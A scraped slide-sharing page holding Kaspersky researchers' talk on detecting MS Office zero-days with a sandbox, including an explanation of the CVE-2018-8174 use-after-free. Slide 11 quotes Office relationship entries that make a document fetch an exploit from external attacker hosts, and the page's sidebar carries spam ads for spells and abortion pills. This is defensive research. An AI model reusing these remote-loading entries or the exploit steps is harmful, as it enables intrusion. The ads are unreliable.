OWASP Europe Summit Portugal 2008. Web Application AssessmentsOWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application Assessments
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)
 
Sergey Stoyan 2016
Sergey Stoyan 2016Sergey Stoyan 2016
Sergey Stoyan 2016
 
Sergey Stoyan 2016
Sergey Stoyan 2016Sergey Stoyan 2016
Sergey Stoyan 2016
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
News bytes Oct-2011
News bytes Oct-2011News bytes Oct-2011
News bytes Oct-2011
 
Defending the Endpoint with Next-Gen Security
Defending the Endpoint with Next-Gen SecurityDefending the Endpoint with Next-Gen Security
Defending the Endpoint with Next-Gen Security
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
vinay-mittal-new
vinay-mittal-newvinay-mittal-new
vinay-mittal-new
 
Security trend analysis with CVE topic models
Security trend analysis with CVE topic modelsSecurity trend analysis with CVE topic models
Security trend analysis with CVE topic models
 
"Wie passen Serverless & Autonomous zusammen?"
"Wie passen Serverless & Autonomous zusammen?""Wie passen Serverless & Autonomous zusammen?"
"Wie passen Serverless & Autonomous zusammen?"
 
Learn Electron for Web Developers
Learn Electron for Web DevelopersLearn Electron for Web Developers
Learn Electron for Web Developers
 

More from Kaspersky

A look at current cyberattacks in Ukraine
A look at current cyberattacks in UkraineA look at current cyberattacks in Ukraine
A look at current cyberattacks in Ukraine
Kaspersky
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
Kaspersky
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
Kaspersky
 
Алексей Гуревич. Кибербезопасность систем управления современных объектов эле...
Алексей Гуревич. Кибербезопасность систем управления современных объектов эле...Алексей Гуревич. Кибербезопасность систем управления современных объектов эле...
Алексей Гуревич. Кибербезопасность систем управления современных объектов эле...
Kaspersky
 
Максим Бородько. Спуфинг GNSS — новая угроза для критической инфраструктуры
Максим Бородько. Спуфинг GNSS — новая угроза для критической инфраструктурыМаксим Бородько. Спуфинг GNSS — новая угроза для критической инфраструктуры
Максим Бородько. Спуфинг GNSS — новая угроза для критической инфраструктуры
Kaspersky
 
Андрей Суворов, Максим Карпухин. Сенсация под микроскопом. Вивисекция первого...
Андрей Суворов, Максим Карпухин. Сенсация под микроскопом. Вивисекция первого...Андрей Суворов, Максим Карпухин. Сенсация под микроскопом. Вивисекция первого...
Андрей Суворов, Максим Карпухин. Сенсация под микроскопом. Вивисекция первого...
Kaspersky
 
Игорь Рыжов. Проекты по защите АСУ ТП вчера, сегодня, завтра
Игорь Рыжов. Проекты по защите АСУ ТП вчера, сегодня, завтраИгорь Рыжов. Проекты по защите АСУ ТП вчера, сегодня, завтра
Игорь Рыжов. Проекты по защите АСУ ТП вчера, сегодня, завтра
Kaspersky
 
Александр Карпенко. Уровни зрелости АСУ ТП как объектов защиты и подходы к ун...
Александр Карпенко. Уровни зрелости АСУ ТП как объектов защиты и подходы к ун...Александр Карпенко. Уровни зрелости АСУ ТП как объектов защиты и подходы к ун...
Александр Карпенко. Уровни зрелости АСУ ТП как объектов защиты и подходы к ун...
Kaspersky
 
Марина Сорокина. Криптография для промышленных систем
Марина Сорокина. Криптография для промышленных системМарина Сорокина. Криптография для промышленных систем
Марина Сорокина. Криптография для промышленных систем
Kaspersky
 
Александр Волошин. Киберполигон "Цифровая энергетика". Исследования и разрабо...
Александр Волошин. Киберполигон "Цифровая энергетика". Исследования и разрабо...Александр Волошин. Киберполигон "Цифровая энергетика". Исследования и разрабо...
Александр Волошин. Киберполигон "Цифровая энергетика". Исследования и разрабо...
Kaspersky
 
Евгений Дружинин. Как не сломать: что важно учесть перед, в ходе и после реал...
Евгений Дружинин. Как не сломать: что важно учесть перед, в ходе и после реал...Евгений Дружинин. Как не сломать: что важно учесть перед, в ходе и после реал...
Евгений Дружинин. Как не сломать: что важно учесть перед, в ходе и после реал...
Kaspersky
 
Алексей Иванов. Реализация проектов АСУ ТП электрических подстанций ​в соотве...
Алексей Иванов. Реализация проектов АСУ ТП электрических подстанций ​в соотве...Алексей Иванов. Реализация проектов АСУ ТП электрических подстанций ​в соотве...
Алексей Иванов. Реализация проектов АСУ ТП электрических подстанций ​в соотве...
Kaspersky
 
Олег Шакиров. Дипломатия и защита критической инфраструктуры от киберугроз
Олег Шакиров. Дипломатия и защита критической инфраструктуры от киберугрозОлег Шакиров. Дипломатия и защита критической инфраструктуры от киберугроз
Олег Шакиров. Дипломатия и защита критической инфраструктуры от киберугроз
Kaspersky
 
Константин Родин. Обеспечение доверенной среды удаленной работы в рамках ​про...
Константин Родин. Обеспечение доверенной среды удаленной работы в рамках ​про...Константин Родин. Обеспечение доверенной среды удаленной работы в рамках ​про...
Константин Родин. Обеспечение доверенной среды удаленной работы в рамках ​про...
Kaspersky
 

More from Kaspersky (20)

A look at current cyberattacks in Ukraine
A look at current cyberattacks in UkraineA look at current cyberattacks in Ukraine
A look at current cyberattacks in Ukraine
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
 
Алексей Гуревич. Кибербезопасность систем управления современных объектов эле...
Алексей Гуревич. Кибербезопасность систем управления современных объектов эле...Алексей Гуревич. Кибербезопасность систем управления современных объектов эле...
Алексей Гуревич. Кибербезопасность систем управления современных объектов эле...
 
Максим Бородько. Спуфинг GNSS — новая угроза для критической инфраструктуры
Максим Бородько. Спуфинг GNSS — новая угроза для критической инфраструктурыМаксим Бородько. Спуфинг GNSS — новая угроза для критической инфраструктуры
Максим Бородько. Спуфинг GNSS — новая угроза для критической инфраструктуры
 
Кирилл Набойщиков. Системный подход к защите КИИ
Кирилл Набойщиков. Системный подход к защите КИИКирилл Набойщиков. Системный подход к защите КИИ
Кирилл Набойщиков. Системный подход к защите КИИ
 
Вениамин Левцов. Cтратегия трансформации решений Лаборатории Касперского для ...
Вениамин Левцов. Cтратегия трансформации решений Лаборатории Касперского для ...Вениамин Левцов. Cтратегия трансформации решений Лаборатории Касперского для ...
Вениамин Левцов. Cтратегия трансформации решений Лаборатории Касперского для ...
 
Мария Гарнаева. Целевые атаки на промышленные компании в 2020/2021
Мария Гарнаева. Целевые атаки на промышленные компании в 2020/2021Мария Гарнаева. Целевые атаки на промышленные компании в 2020/2021
Мария Гарнаева. Целевые атаки на промышленные компании в 2020/2021
 
Андрей Суворов, Максим Карпухин. Сенсация под микроскопом. Вивисекция первого...
Андрей Суворов, Максим Карпухин. Сенсация под микроскопом. Вивисекция первого...Андрей Суворов, Максим Карпухин. Сенсация под микроскопом. Вивисекция первого...
Андрей Суворов, Максим Карпухин. Сенсация под микроскопом. Вивисекция первого...
 
Глеб Дьяконов. ИИ-видеоаналитика как инструмент корпоративного риск-менеджмен...
Глеб Дьяконов. ИИ-видеоаналитика как инструмент корпоративного риск-менеджмен...Глеб Дьяконов. ИИ-видеоаналитика как инструмент корпоративного риск-менеджмен...
Глеб Дьяконов. ИИ-видеоаналитика как инструмент корпоративного риск-менеджмен...
 
Игорь Рыжов. Проекты по защите АСУ ТП вчера, сегодня, завтра
Игорь Рыжов. Проекты по защите АСУ ТП вчера, сегодня, завтраИгорь Рыжов. Проекты по защите АСУ ТП вчера, сегодня, завтра
Игорь Рыжов. Проекты по защите АСУ ТП вчера, сегодня, завтра
 
Александр Карпенко. Уровни зрелости АСУ ТП как объектов защиты и подходы к ун...
Александр Карпенко. Уровни зрелости АСУ ТП как объектов защиты и подходы к ун...Александр Карпенко. Уровни зрелости АСУ ТП как объектов защиты и подходы к ун...
Александр Карпенко. Уровни зрелости АСУ ТП как объектов защиты и подходы к ун...
 
Марина Сорокина. Криптография для промышленных систем
Марина Сорокина. Криптография для промышленных системМарина Сорокина. Криптография для промышленных систем
Марина Сорокина. Криптография для промышленных систем
 
Александр Лифанов. Платформа граничных вычислений Siemens Industrial Edge: пе...
Александр Лифанов. Платформа граничных вычислений Siemens Industrial Edge: пе...Александр Лифанов. Платформа граничных вычислений Siemens Industrial Edge: пе...
Александр Лифанов. Платформа граничных вычислений Siemens Industrial Edge: пе...
 
Александр Волошин. Киберполигон "Цифровая энергетика". Исследования и разрабо...
Александр Волошин. Киберполигон "Цифровая энергетика". Исследования и разрабо...Александр Волошин. Киберполигон "Цифровая энергетика". Исследования и разрабо...
Александр Волошин. Киберполигон "Цифровая энергетика". Исследования и разрабо...
 
Евгений Дружинин. Как не сломать: что важно учесть перед, в ходе и после реал...
Евгений Дружинин. Как не сломать: что важно учесть перед, в ходе и после реал...Евгений Дружинин. Как не сломать: что важно учесть перед, в ходе и после реал...
Евгений Дружинин. Как не сломать: что важно учесть перед, в ходе и после реал...
 
Алексей Иванов. Реализация проектов АСУ ТП электрических подстанций ​в соотве...
Алексей Иванов. Реализация проектов АСУ ТП электрических подстанций ​в соотве...Алексей Иванов. Реализация проектов АСУ ТП электрических подстанций ​в соотве...
Алексей Иванов. Реализация проектов АСУ ТП электрических подстанций ​в соотве...
 
Олег Шакиров. Дипломатия и защита критической инфраструктуры от киберугроз
Олег Шакиров. Дипломатия и защита критической инфраструктуры от киберугрозОлег Шакиров. Дипломатия и защита критической инфраструктуры от киберугроз
Олег Шакиров. Дипломатия и защита критической инфраструктуры от киберугроз
 
Василий Шауро. Развитие кибербезопасности АСУТП ​в условиях цифровизации пред...
Василий Шауро. Развитие кибербезопасности АСУТП ​в условиях цифровизации пред...Василий Шауро. Развитие кибербезопасности АСУТП ​в условиях цифровизации пред...
Василий Шауро. Развитие кибербезопасности АСУТП ​в условиях цифровизации пред...
 
Константин Родин. Обеспечение доверенной среды удаленной работы в рамках ​про...
Константин Родин. Обеспечение доверенной среды удаленной работы в рамках ​про...Константин Родин. Обеспечение доверенной среды удаленной работы в рамках ​про...
Константин Родин. Обеспечение доверенной среды удаленной работы в рамках ​про...
 

Recently uploaded

%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
masabamasaba
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Medical / Health Care (+971588192166) Mifepristone and Misoprostol tablets 200mg
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
masabamasaba
 
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
masabamasaba
 

Recently uploaded (20)

%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
 
WSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go Platformless
 
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
 
WSO2CON 2024 - How to Run a Security Program
WSO2CON 2024 - How to Run a Security ProgramWSO2CON 2024 - How to Run a Security Program
WSO2CON 2024 - How to Run a Security Program
 
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
WSO2CON 2024 Slides - Open Source to SaaS
WSO2CON 2024 Slides - Open Source to SaaSWSO2CON 2024 Slides - Open Source to SaaS
WSO2CON 2024 Slides - Open Source to SaaS
 
%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
Announcing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK SoftwareAnnouncing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK Software
 
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
 

Catching Multilayered Zero-Day Attacks on MS Office

  • 1. Boris Larin Vladislav Stolyarov Catching multilayered zero-day attacks on MS Office
  • 2. $whoweare Malware Analyst (Heuristic Detection and Vulnerability Research Team) Boris Larin Malware Analyst (Heuristic Detection and Vulnerability Research Team) Vlad Stolyarov Twitter: @oct0xor Twitter: @vladhiewsha
  • 3. 1. Introduction to the MS Office threat landscape 2. Introduction to sandbox 3. Using sandbox to find MS Office zero-days 4. The story of CVE-2018-8174 (zero-day found with sandbox) 5. Internals of VBScript Talk Outline
  • 4. 4 Adobe Flash 13% Office 16%Android 19% Browsers 45% PDF 1% Java 6% 2016 Q4 Targeted platforms by attacked users Adobe Flash 1% Office 70% Android 12% Browsers 14% PDF 0% Java 3% 2018 Q4
  • 5. 5 CVE-2017-8759 CVE-2017-11826 CVE-2017-11882 CVE-2018-8174 20182017 5% 90% 5% CVE-2018-0802 CVE-2017-8570CVE-2017-0199 CVE-2014-6352 CVE-2014-4114 CVE-2012-1856 CVE-2015-1641 CVE-2017-0262CVE-2016-7193 90% 10% 2018 2016 CVE-2017-11292 CVE-2018-5002CVE-2016-7193 CVE-2016-4117 The life cycle of an Office exploit has shortened substantially. So has the entry bar: — In 2016, the most exploited vulnerabilities were two to four years old. They were also complex memory corruptions that required a high entry bar to exploit (Mscomctl and EPS vulnerabilities). — In 2018, the bar has lowered significantly and even a non-skilled person can create an exploit builder using PoCs from public resources (Moniker and Equation bugs). Sometimes the only thing that needs to be modified is the command line to be executed as payload. CVE-2018-4878 Timeline CVE-2017-0261CVE-2012-0158
  • 6. 6 Arsenal Most exploited Office vulnerabilities today Logical bugs are a thing: — As seen with three of the most popular CVEs: CVE-2017-0199, CVE-2017-8570 and CVE-2017-8759, even logical bugs can lead to Remote Command Execution Binary exploitation is possible on latest Office versions: — Code execution can be achieved even in a no-scriptable environment for several type of memory corruption bugs. — They can be just as reliable as logical ones – CVE-2017-11882 and CVE-2018- 0802 is a great example. Exploit for them worked on all Microsoft Office versions released in the past 17 years CVE-2017-8759 SOAP WSDL parser code injection vulnerability. The bug itself is in .NET framework, but can be triggered from document using SOAP moniker. Found exploited ITW CVE-2017-8570 “Bypass” of CVE-2017-0199 fix with the use of composite moniker CVE-2017-0199 Logical bug - scripts pointed to by URL moniker can be interpreted as HTA content without any restrictions Classical stack buffer overflow in legacy Microsoft Equation Editor componentCVE-2017-11882 Two different bugs in Equation Editor under the same CVE id. Discovered one month after CVE-2017-11882 patch CVE-2018-0802
  • 7. 7 Arsenal Most exploited Office vulnerabilities today Logical bugs are a thing: — As seen with three of the most popular CVEs: CVE-2017-0199, CVE-2017-8570 and CVE-2017-8759, even logical bugs can lead to Remote Command Execution Binary exploitation is possible on latest Office versions: — Code execution can be achieved even in a no-scriptable environment for several type of memory corruption bugs. — They can be just as reliable as logical ones – CVE-2017-11882 and CVE-2018- 0802 is a great example. Exploit for them worked on all Microsoft Office versions released in the past 17 years All of these vulnerabilities aren’t in the Office itself. CVE-2017-8759 SOAP WSDL parser code injection vulnerability. The bug itself is in .NET framework, but can be triggered from document using SOAP moniker. Found exploited ITW CVE-2017-8570 “Bypass” of CVE-2017-0199 fix with the use of composite moniker CVE-2017-0199 Logical bug - scripts pointed to by URL moniker can be interpreted as HTA content without any restrictions Classical stack buffer overflow in legacy Microsoft Equation Editor componentCVE-2017-11882 Two different bugs in Equation Editor under the same CVE id. Discovered one month after CVE-2017-11882 patch CVE-2018-0802
  • 8. Attack surface is huge! Bad decisions from a security point of view Complicated file formats Deep integration with MS Windows Interoperability Legacy features
  • 9. Obscure features – Exploitation primitives Attackers can gather their own statistics AV evasion / prevent zero-day from burning
  • 10. Obscure features – Exploitation primitives “Added additional exploit mode, that allows with the use of “MWISTAT” statistics web-server log when and at what time the document was opened, was the payload downloaded, which IP-address was used, as well as some other information, such as User-Agent.” Attackers can gather their own statistics Cybercriminals: exploit.rtf
  • 11. Obscure features – Exploitation primitives 1. Deploy decoy document 2. MS Office will automatically download and launch document with real exploit from remote storage <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="https://a.pomf.cat/hlxqom.doc" TargetMode="External" /> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://kajlaraykaj.com/file/mine001.doc" TargetMode="External" /> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="http://jugnitv.com/final.jpg" TargetMode="External" /> AV Evasion / Prevent Zero-day from burning exploit_1.docxword_relsdocument.xml.rels exploit_2.docxword_relssettings.xml.rels exploit_3.docxword_relswebSettings.xml.rels
  • 12. 12 Caught in the wild… • CVE-2018-8174 (Windows VBScript Engine Remote Code Execution Vulnerability) • CVE-2018-8453 (Win32k Elevation of Privilege Vulnerability) • CVE-2018-8589 (Win32k Elevation of Privilege Vulnerability) In 2018 alone: All vulnerabilities were reported to Microsoft
  • 13. The sandbox Artifacts assembled for analysis A file / URL for testing - Execution logs - Memory dumps - System / registry changes - Network connections - Screenshots - Exploit artifacts Verdict and rich data on activity Test VMs The file / URL is sent to several test VMs Artifacts logged
  • 14. 75 high-performance servers 2500 vCPUs 2000 virtual machines are running at any given time Up to four million objects per day are processed by the service at peak times Some facts
  • 15. Design Guest OS User Mode Kernel Mode Process 1 Process 2 Kernel Drivers Syscall Filter API Logger Network Threads Registry Files Artifacts
  • 16. API log [0XXX] >> ShellExecuteExW ("[HIDDEN_DIR]e15b36c2e394d599a8ab352159089dd2.doc") <PROCESS_CREATE_SUCCESS Pid="0xXXX" ParentPid="0xXXX" CreatedPid="0xYYY" /> <PROC_LOG_START Pid="0xYYY" RequestorPid="0xXXX" Reason="OnCreateChild"> <ImagePath>DeviceHarddiskVolumeZProgram Files (x86)Microsoft OfficeOffice14WINWORD.EXE</ImagePath> <CmdLine></CmdLine></PROC_LOG_START> <LOAD_IMAGE Pid="0xYYY" ImageBase="0x30000000" ImageSize="0x15d000"> <ImagePath>DeviceHarddiskVolumeZProgram Files (x86)Microsoft OfficeOffice14WINWORD.EXE</ImagePath></LOAD_IMAGE> <LOAD_IMAGE Pid="0xYYY" ImageBase="0x78e50000" ImageSize="0x1a9000"> <ImagePath>SystemRootSystem32ntdll.dll</ImagePath></LOAD_IMAGE> <LOAD_IMAGE Pid="0xYYY" ImageBase="0x7de70000" ImageSize="0x180000"> <ImagePath>SystemRootSysWOW64ntdll.dll</ImagePath></LOAD_IMAGE> [0YYY] >> SetWindowTextW (0000000000050018,00000000001875BC -> "e15b36c2e394d599a8ab352159089dd2.doc [Compatibility Mode] — Microsoft Word") => 00000000390A056C {0000} <FILE_CREATED Pid="0xYYY">
  • 17. Exploit Checker Detection of exploits in scope of application and system wide — Exploited exceptions: — DEP violation — Heap corruption — Illegal/privileged instruction — Others — Stack execution — EoP detection — Predetection of Heap Spray — Execution of user space code in Ring 0 — Change of process token — Others Sandbox has support for plugins. One of the plugins is Exploit Checker.
  • 18. Exploit Checker > API log […] UserSpaceSupervisorCPL(“VA:0000000001FC29C0”,allocbase=0000000001FC0000,base =0000000001FC2000,size=4096(0x1000),dumpBase=0000000001FC2000,dumpid=0xD) SecurityTokenChanged() […]
  • 19. Looking for zero-days Signature-based protection Cloud-based protection Heuristic scanning HIPS and personal firewall Automatic exploit prevention System watcher Kaspersky security products for endpoints has very advanced heuristic capabilities in the detection of threats delivered through MS Office documents Heuristic engine is aware of all file formats and obfuscations for documents
  • 20. Looking for zero-days Signature-based protection Cloud-based protection Heuristic scanning HIPS and personal firewall Automatic exploit prevention System Watcher Kaspersky security products for endpoints has very advanced heuristic capabilities in the detection of threats delivered through MS Office documents Heuristic engine is aware of all file formats and obfuscations for documents
  • 21. Looking for zero-days Process file In case of exploits this is a very rare occurrence: high chance of a zero-day HEURISTIC SCANNING Clean SANDBOX Malicious
  • 22. Looking for zero-days Process file File is recognized as malicious by heuristic scanning and sandbox Can it be a zero-day? HEURISTIC SCANNING Malicious SANDBOX Malicious
  • 23. Looking for zero-days Process file File is recognized as malicious by heuristic scanning and sandbox. Can it be a zero-day? HEURISTIC SCANNING Malicious SANDBOX Malicious YES. It happens often.
  • 24. Looking for zero-days bucket More generic detection logic versus Less generic detection logic Statistic Clustering
  • 26. CVE-2018-8174 (VirusTotal at 2018-04-18 06:50:30) Found in late April 2018 Was detected by our products prior to us finding it We would not have been able to find it if only samples that do not have detection were processed in the sandbox
  • 27. CVE-2018-8174 Exploit is found in MS Office document But the vulnerability is in Internet Explorer This particular vulnerability and subsequent exploit are interesting for many reasons
  • 30. 30 CVE-2018-8174 – Exploit Is it CVE-2017-0199?
  • 31. 31 CVE-2017-0199 Strikes Back Response page is handled with mshtml.dll InProc COM Server, not mshta.exe. Content type in HTTP response header is ‘text/html’, and not ‘application/hta’. Well, not really
  • 32. 32 Enter CVE-2018-8174 — Initial RTF document contains single embedded OLE object with a URL Moniker, that downloads a page from provided link. — Now a COM object needs to be selected to handle the content. — Handler is selected based on extension, Content-Type and some other parameters. — Content-Type is ‘text/html’, which results in page being handled by mshtml.dll - library that contains the engine behind Internet Explorer. — A browser exploit is still required, because with MSHTML the scripts that are running in a restricted mode by default. — That was not true with CVE-2017-0199 – MSHTA handler is known to be a dangerous component that would run any VBJS scripts found in file unrestricted.
  • 33. 33 Enter CVE-2018-8174 Restricted COM objects from IActivationFilter in MSO.dll
  • 34. 34 Enter CVE-2018-8174 Restricted COM objects from IActivationFilter in MSO.dllBut not mshtml.HTMLDocument. (At least not yet).
  • 35. VBScript Object Lifetime 35 Object Lifetime: How Objects Are Created and Destroyed (Visual Basic) After an object leaves scope, it is released by the common language runtime (CLR). Visual Basic controls the release of system resources using procedures called destructors. Together, constructors and destructors support the creation of robust and predictable class libraries. Constructors and destructors control the creation and destruction of objects. The Sub New and Sub Finalize procedures in Visual Basic initialize and destroy objects; they replace the Class_Initialize and Class_Terminate methods used in Visual Basic 6.0 and earlier versions. https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language- features/objects-and-classes/object-lifetime-how-objects-are-created-and-destroyed
  • 36. Object Lifetime: How Objects Are Created and Destroyed (Visual Basic) After an object leaves scope, it is released by the common language runtime (CLR). Visual Basic controls the release of system resources using procedures called destructors. Together, constructors and destructors support the creation of robust and predictable class libraries. Constructors and destructors control the creation and destruction of objects. The Sub New and Sub Finalize procedures in Visual Basic initialize and destroy objects; they replace the Class_Initialize and Class_Terminate methods used in Visual Basic 6.0 and earlier versions. VBScript Object Lifetime 36 https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language- features/objects-and-classes/object-lifetime-how-objects-are-created-and-destroyed
  • 37. CVE-2018-8174 – Use After Free 37 Object of ClassTerminateA is created and then instantly erased. Since reference counter is now zero this calls VBScript::Release for object to be freed by GC. While object is being freed an overridden Class_Terminate is called. We store dangling reference to deleted object in ArrWithUafA array. To balance out increased reference counter ArrWithFreedObject(1) is assigned to some other value. class1FreedObject is created after the loop. It will be allocated in the same memory that was used for ClassTerminateA objects.
  • 38. CVE-2018-8174 – Use After Free 38
  • 39. CVE-2018-8174 – Exploit 39 But this time it is used to allocate object of type Class2Reused This leads to us having 2 references – class1FreedObject and class2ReusedObject that point to same memory address and are instances of different Classes. The same procedure from before repeats to decrease reference counter 7 times and trigger Class_Terminate destructor again.
  • 40. CVE-2018-8174 – Exploit This leads to us having 2 references – class1FreedObject and class2ReusedObject that point to same memory address and are instances of different Classes. Class1 Class2
